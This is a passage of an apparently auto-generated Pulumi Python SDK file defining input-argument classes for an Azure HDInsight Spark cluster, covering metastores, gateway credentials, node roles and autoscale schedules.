:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight RServer Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight RServer Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class SparkClusterComponentVersionArgs:
def __init__(__self__, *,
spark: pulumi.Input[str]):
"""
:param pulumi.Input[str] spark: The version of Spark which should be used for this HDInsight Spark Cluster. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "spark", spark)
@property
@pulumi.getter
def spark(self) -> pulumi.Input[str]:
"""
The version of Spark which should be used for this HDInsight Spark Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "spark")
@spark.setter
def spark(self, value: pulumi.Input[str]):
pulumi.set(self, "spark", value)
@pulumi.input_type
class SparkClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class SparkClusterMetastoresArgs:
def __init__(__self__, *,
ambari: Optional[pulumi.Input['SparkClusterMetastoresAmbariArgs']] = None,
hive: Optional[pulumi.Input['SparkClusterMetastoresHiveArgs']] = None,
oozie: Optional[pulumi.Input['SparkClusterMetastoresOozieArgs']] = None):
"""
:param pulumi.Input['SparkClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
:param pulumi.Input['SparkClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
:param pulumi.Input['SparkClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
"""
if ambari is not None:
pulumi.set(__self__, "ambari", ambari)
if hive is not None:
pulumi.set(__self__, "hive", hive)
if oozie is not None:
pulumi.set(__self__, "oozie", oozie)
@property
@pulumi.getter
def ambari(self) -> Optional[pulumi.Input['SparkClusterMetastoresAmbariArgs']]:
"""
An `ambari` block as defined below.
"""
return pulumi.get(self, "ambari")
@ambari.setter
def ambari(self, value: Optional[pulumi.Input['SparkClusterMetastoresAmbariArgs']]):
pulumi.set(self, "ambari", value)
@property
@pulumi.getter
def hive(self) -> Optional[pulumi.Input['SparkClusterMetastoresHiveArgs']]:
"""
A `hive` block as defined below.
"""
return pulumi.get(self, "hive")
@hive.setter
def hive(self, value: Optional[pulumi.Input['SparkClusterMetastoresHiveArgs']]):
pulumi.set(self, "hive", value)
@property
@pulumi.getter
def oozie(self) -> Optional[pulumi.Input['SparkClusterMetastoresOozieArgs']]:
"""
An `oozie` block as defined below.
"""
return pulumi.get(self, "oozie")
@oozie.setter
def oozie(self, value: Optional[pulumi.Input['SparkClusterMetastoresOozieArgs']]):
pulumi.set(self, "oozie", value)
@pulumi.input_type
class SparkClusterMetastoresAmbariArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SparkClusterMetastoresHiveArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SparkClusterMetastoresOozieArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SparkClusterMonitorArgs:
def __init__(__self__, *,
log_analytics_workspace_id: pulumi.Input[str],
primary_key: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
:param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
"""
pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
pulumi.set(__self__, "primary_key", primary_key)
@property
@pulumi.getter(name="logAnalyticsWorkspaceId")
def log_analytics_workspace_id(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace ID.
"""
return pulumi.get(self, "log_analytics_workspace_id")
@log_analytics_workspace_id.setter
def log_analytics_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "log_analytics_workspace_id", value)
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace key.
"""
return pulumi.get(self, "primary_key")
@primary_key.setter
def primary_key(self, value: pulumi.Input[str]):
pulumi.set(self, "primary_key", value)
@pulumi.input_type
class SparkClusterNetworkArgs:
def __init__(__self__, *,
connection_direction: Optional[pulumi.Input[str]] = None,
private_link_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] connection_direction: The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] private_link_enabled: Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
"""
if connection_direction is not None:
pulumi.set(__self__, "connection_direction", connection_direction)
if private_link_enabled is not None:
pulumi.set(__self__, "private_link_enabled", private_link_enabled)
@property
@pulumi.getter(name="connectionDirection")
def connection_direction(self) -> Optional[pulumi.Input[str]]:
"""
The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "connection_direction")
@connection_direction.setter
def connection_direction(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_direction", value)
@property
@pulumi.getter(name="privateLinkEnabled")
def private_link_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "private_link_enabled")
@private_link_enabled.setter
def private_link_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "private_link_enabled", value)
@pulumi.input_type
class SparkClusterRolesArgs:
def __init__(__self__, *,
head_node: pulumi.Input['SparkClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['SparkClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['SparkClusterRolesZookeeperNodeArgs']):
"""
:param pulumi.Input['SparkClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['SparkClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['SparkClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
"""
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['SparkClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['SparkClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['SparkClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['SparkClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['SparkClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['SparkClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class SparkClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
autoscale: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs']] = None,
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if autoscale is not None:
pulumi.set(__self__, "autoscale", autoscale)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def autoscale(self) -> Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs']]:
"""
A `autoscale` block as defined below.
"""
return pulumi.get(self, "autoscale")
@autoscale.setter
def autoscale(self, value: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs']]):
pulumi.set(self, "autoscale", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleArgs:
def __init__(__self__, *,
capacity: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs']] = None,
recurrence: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
"""
:param pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs'] capacity: A `capacity` block as defined below.
:param pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
"""
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if recurrence is not None:
pulumi.set(__self__, "recurrence", recurrence)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs']]:
"""
A `capacity` block as defined below.
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs']]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def recurrence(self) -> Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
"""
A `recurrence` block as defined below.
"""
return pulumi.get(self, "recurrence")
@recurrence.setter
def recurrence(self, value: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
pulumi.set(self, "recurrence", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleCapacityArgs:
def __init__(__self__, *,
max_instance_count: pulumi.Input[int],
min_instance_count: pulumi.Input[int]):
"""
:param pulumi.Input[int] max_instance_count: The maximum number of worker nodes to autoscale to based on the cluster's activity.
:param pulumi.Input[int] min_instance_count: The minimum number of worker nodes to autoscale to based on the cluster's activity.
"""
pulumi.set(__self__, "max_instance_count", max_instance_count)
pulumi.set(__self__, "min_instance_count", min_instance_count)
@property
@pulumi.getter(name="maxInstanceCount")
def max_instance_count(self) -> pulumi.Input[int]:
"""
The maximum number of worker nodes to autoscale to based on the cluster's activity.
"""
return pulumi.get(self, "max_instance_count")
@max_instance_count.setter
def max_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "max_instance_count", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> pulumi.Input[int]:
"""
The minimum number of worker nodes to autoscale to based on the cluster's activity.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "min_instance_count", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
def __init__(__self__, *,
schedules: pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
timezone: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
:param pulumi.Input[str] timezone: The time zone for the autoscale schedule times.
"""
pulumi.set(__self__, "schedules", schedules)
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
"""
A list of `schedule` blocks as defined below.
"""
return pulumi.get(self, "schedules")
@schedules.setter
def schedules(self, value: pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
pulumi.set(self, "schedules", value)
@property
@pulumi.getter
def timezone(self) -> pulumi.Input[str]:
"""
The time zone for the autoscale schedule times.
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: pulumi.Input[str]):
pulumi.set(self, "timezone", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
def __init__(__self__, *,
days: pulumi.Input[Sequence[pulumi.Input[str]]],
target_instance_count: pulumi.Input[int],
time: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week to perform autoscale.
:param pulumi.Input[int] target_instance_count: The number of worker nodes to autoscale at the specified time.
:param pulumi.Input[str] time: The time of day to perform the autoscale in 24hour format.
"""
pulumi.set(__self__, "days", days)
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "time", time)
@property
@pulumi.getter
def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The days of the week to perform autoscale.
"""
return pulumi.get(self, "days")
@days.setter
def days(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "days", value)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of worker nodes to autoscale at the specified time.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def time(self) -> pulumi.Input[str]:
"""
The time of day to perform the autoscale in 24hour format.
"""
return pulumi.get(self, "time")
@time.setter
def time(self, value: pulumi.Input[str]):
pulumi.set(self, "time", value)
@pulumi.input_type
class SparkClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
